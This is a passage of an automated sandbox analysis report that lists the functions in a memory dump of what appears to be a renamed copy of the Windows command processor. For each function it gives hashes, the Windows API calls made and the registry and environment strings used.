                                                                                                                    • Instruction ID: ae2202a0480b99ed464ef0b5070acc91f0aabaf930c9c4a830528453e193ca86
                                                                                                                    • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                                    • Instruction Fuzzy Hash: BCF16C61B1874A85EF21AF25E9182B9AAB4BF45F82FE44136CA0D47794EF3CE505C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                                    • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                                    • API String ID: 388421343-2905461000
                                                                                                                    • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                    • Instruction ID: b4e903eed802f40e9525ce57264badc599e2c24fa786fcd63b5b36c69964f04a
                                                                                                                    • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                                    • Instruction Fuzzy Hash: BEF14131A09B8A86EA60AF11E4487B9FBB5FB85F92FA44135D94D43794DF3CE444CB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryValue$CloseOpensrandtime
                                                                                                                    • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                                    • API String ID: 145004033-3846321370
                                                                                                                    • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                    • Instruction ID: 80abdf1a29dad377d8dae6f07b4cd7864bf9554a47194cd5cc6fd5bbaefcd3e6
                                                                                                                    • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                                    • Instruction Fuzzy Hash: B2E1953252DA8AC6E750AF10E45457AFBB0FB89B52FE05135E68E02A58EF7CD544CB20
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                    • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                    • API String ID: 2624720099-1920437939
                                                                                                                    • Opcode ID: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                                                                                    • Instruction ID: 2436aa6c33d83ad91ce85a9e07408ea0eefe66a246b40004408f7d46e0cdb038
                                                                                                                    • Opcode Fuzzy Hash: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                                                                                    • Instruction Fuzzy Hash: CAC18C31E0868A8AF754BF7094481B8FEB1FF49F56FE44138DA1E46696EE3DA441C720
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileFindFirstLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 873889042-0
                                                                                                                    • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                    • Instruction ID: 196cf54ec60c38fdba15b431657db5115ae316bfc1b8da5665afffb6fb90c31e
                                                                                                                    • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                    • Instruction Fuzzy Hash: 81510776A09B8A86E740AF12E444579BFB0FB8AF92FA48131DA1D43790DF3DE454C760
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                    • Instruction ID: 941d9827e2b7c2d94e2c204780a2ef4b77564c7aaa49dac1c8b8b3a0153c21b8
                                                                                                                    • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                    • Instruction Fuzzy Hash: 56511C61B0868A85EA30AF55954827AEA70FB54FE6FE45234DE6D077D0DF3CE441C710
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4D9A
                                                                                                                      • Part of subcall function 00007FF789BD58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF789BEC6DB), ref: 00007FF789BD58EF
                                                                                                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4DBB
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BD4DCA
                                                                                                                    • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4DE0
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BD4DEE
                                                                                                                    • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4E04
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD0589
                                                                                                                      • Part of subcall function 00007FF789BD0580: SetConsoleMode.KERNELBASE ref: 00007FF789BD059E
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD05AF
                                                                                                                      • Part of subcall function 00007FF789BD0580: GetConsoleMode.KERNELBASE ref: 00007FF789BD05C5
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD05EF
                                                                                                                      • Part of subcall function 00007FF789BD0580: GetConsoleMode.KERNELBASE ref: 00007FF789BD0605
                                                                                                                      • Part of subcall function 00007FF789BD0580: _get_osfhandle.MSVCRT ref: 00007FF789BD0632
                                                                                                                      • Part of subcall function 00007FF789BD0580: SetConsoleMode.KERNELBASE ref: 00007FF789BD0647
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A28
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A66
                                                                                                                      • Part of subcall function 00007FF789BD4A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A7D
                                                                                                                      • Part of subcall function 00007FF789BD4A14: memmove.MSVCRT(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A9A
                                                                                                                      • Part of subcall function 00007FF789BD4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4AA2
                                                                                                                      • Part of subcall function 00007FF789BD4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AD6
                                                                                                                      • Part of subcall function 00007FF789BD4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AEF
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF789BD4E35), ref: 00007FF789BD55DA
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD5623
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD5667
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD56BE
                                                                                                                      • Part of subcall function 00007FF789BD5554: RegQueryValueExW.KERNELBASE ref: 00007FF789BD5702
                                                                                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4E35
                                                                                                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4E81
                                                                                                                    • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4F69
                                                                                                                    • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4F95
                                                                                                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FB0
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FC1
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FD8
                                                                                                                    • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD4FF8
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD5037
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD504B
                                                                                                                    • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD50DF
                                                                                                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD50F2
                                                                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD510F
                                                                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD5130
                                                                                                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD514A
                                                                                                                    • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF789BD5175
                                                                                                                      • Part of subcall function 00007FF789BD3578: _get_osfhandle.MSVCRT ref: 00007FF789BD3584
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
                                                                                                                      • Part of subcall function 00007FF789BD3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
                                                                                                                      • Part of subcall function 00007FF789BD3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressHandleProcProcess$AllocCommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireAllocateBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                    • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                    • API String ID: 3614140610-3021193919
                                                                                                                    • Opcode ID: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                                                                                                    • Instruction ID: 22efc88dd552683d3af2fb7c024f1b8c5bdbf79637bb056f4780cf7cfe8c1f69
                                                                                                                    • Opcode Fuzzy Hash: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                                                                                                    • Instruction Fuzzy Hash: 99C16F61A09A4A96EA44BF21E814178EFB1FF89F92FE48134D90E03795EF3DA445C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 1809961153-336475711
                                                                                                                    • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                                                    • Instruction ID: b0d96a2fd9b7916e2b00d8c2bbcad7862bcae1d816a6a14b0cde534e318dba2c
                                                                                                                    • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                                                    • Instruction Fuzzy Hash: 1DD16F3260CB8992EA60EF15E4582B9FBB1FB84B96F944135DA4E437A5EF3CE444C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                    • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                    • API String ID: 2622545777-4197029667
                                                                                                                    • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                                                    • Instruction ID: 60fd9973c3da53a564de136386a01161a2632694cfad739d6541687127a0554c
                                                                                                                    • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                                                    • Instruction Fuzzy Hash: ED919021B09B8A85EE24AF50D8582B8ABB1FF49F96FE44135C90E47695EF3CE505C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                     • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                     • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleMode_get_osfhandle
                                                                                                                    • String ID: CMD.EXE
                                                                                                                    • API String ID: 1606018815-3025314500
                                                                                                                    • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                    • Instruction ID: 3299cb7f43317e234de5a003531adecd52e5948384da8e56c3566d34a81e151e
                                                                                                                    • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                    • Instruction Fuzzy Hash: 7741A835A09746DBE644AF25E855578FEB0BB89F56FE58139C90E433A0EF3DA404C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleTitlewcschr
                                                                                                                    • String ID: /$:
                                                                                                                    • API String ID: 2364928044-4222935259
                                                                                                                    • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                                    • Instruction ID: b8abf05d1ee36f7657701d36279c7cd405663751491767debf31f8a4a979afa1
                                                                                                                    • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                                    • Instruction Fuzzy Hash: 21C1C361A0864A81EB54BF25D818279EAB0FF91FAAFE45531D91E472D5EF3CEC41C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    [Control-flow graph rendered as an image in the original report; graph text not reproduced. Function entry block: 7ff789bd8d80. Blocks reference the APIs Sleep, _amsg_exit, _initterm, exit and _cexit.]
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
